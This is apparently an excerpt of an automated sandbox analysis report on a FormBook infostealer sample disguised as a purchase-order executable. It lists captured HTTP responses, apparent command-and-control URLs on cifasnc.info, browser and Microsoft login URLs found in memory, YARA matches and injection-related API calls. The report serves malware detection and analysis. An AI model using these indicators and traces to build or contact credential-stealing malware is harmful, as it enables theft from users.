70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:38 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 16:25:09 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 16:25:12 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 16:25:14 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Jan 2025 16:25:17 GMTContent-Type: text/htmlContent-Length: 0Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:26:07 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:26:10 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:26:12 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:26:15 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 08:26:21 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 08:26:24 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:26:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Thu, 16 Jan 2025 08:26:35 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbQxDok4yUYG5qBuv3QGBZTXN1BAzF9TZV3kRgA4ojlqeLvEIwQjatNIdLBaUnytMJnkXii0x23tJCFBdpvWR7MbmcdNSLBirGb8%2Bu6R2qxT1r4racD05ooIrYr%2FvLWeA9T%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb8b11de48268-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7345&min_rtt=7345&rtt_var=3672&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:26:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Thu, 16 Jan 2025 08:26:37 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5X2XF4qtA7oxMelL%2BA8PdxuK12d6KTXVymiAWlp9KayTNNIKFTKCQTKJN2Y%2B8WaVXbjjQdfrKWlcYqrqs23pry55dut8fRChm0lmO0d%2FRzaHYe0%2Fmw1M%2BjVb27jfWbeC5XxI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb8c0f8c39c7c-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7210&min_rtt=7210&rtt_var=3605&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:26:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Thu, 16 Jan 2025 08:26:40 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ru8W4zVBt6ZgXdSWpV4VK9ml8vjiO1ctc7rH7xDNUlCK%2BMFxRYvE9TxbVDd6V2wYvxoitSssnk0Zi%2F6tEeemvKMHkWgmVVuDPTZV7CcuOZnHsuP9u4EwPIFkwbRMFYv5n%2Bg%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb8d109aeab7c-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14180&min_rtt=14180&rtt_var=7090&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1777&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3925085807.0000000007216000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3920746147.00000000050A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3925085807.0000000007216000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3920746147.00000000050A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/xmlrpc.php
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3926275354.00000000084BD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cifasnc.info
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3926275354.00000000084BD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cifasnc.info/8rr3/
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3925085807.0000000006A3C000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3920746147.00000000048CC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000004.00000002.3919628546.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 00000004.00000002.3919628546.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000004.00000002.3919628546.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000004.00000002.3919628546.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: fc.exe, 00000004.00000002.3919628546.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000004.00000002.3919628546.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000004.00000003.2595895926.0000000008227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F3CB43 NtClose,0_2_00F3CB43
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2B60 NtClose,LdrInitializeThunk,0_2_00FD2B60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_00FD2C70
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_00FD2DF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD35C0 NtCreateMutant,LdrInitializeThunk,0_2_00FD35C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD4340 NtSetContextThread,0_2_00FD4340
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD4650 NtSuspendThread,0_2_00FD4650
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2AF0 NtWriteFile,0_2_00FD2AF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2AD0 NtReadFile,0_2_00FD2AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2AB0 NtWaitForSingleObject,0_2_00FD2AB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2BF0 NtAllocateVirtualMemory,0_2_00FD2BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2BE0 NtQueryValueKey,0_2_00FD2BE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2BA0 NtEnumerateValueKey,0_2_00FD2BA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2B80 NtQueryInformationFile,0_2_00FD2B80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2CF0 NtOpenProcess,0_2_00FD2CF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2CC0 NtQueryVirtualMemory,0_2_00FD2CC0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2CA0 NtQueryInformationToken,0_2_00FD2CA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2C60 NtCreateKey,0_2_00FD2C60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2C00 NtQueryInformationProcess,0_2_00FD2C00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2DD0 NtDelayExecution,0_2_00FD2DD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2DB0 NtEnumerateKey,0_2_00FD2DB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2D30 NtUnmapViewOfSection,0_2_00FD2D30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2D10 NtMapViewOfSection,0_2_00FD2D10
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2D00 NtSetInformationFile,0_2_00FD2D00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2EE0 NtQueueApcThread,0_2_00FD2EE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2EA0 NtAdjustPrivilegesToken,0_2_00FD2EA0
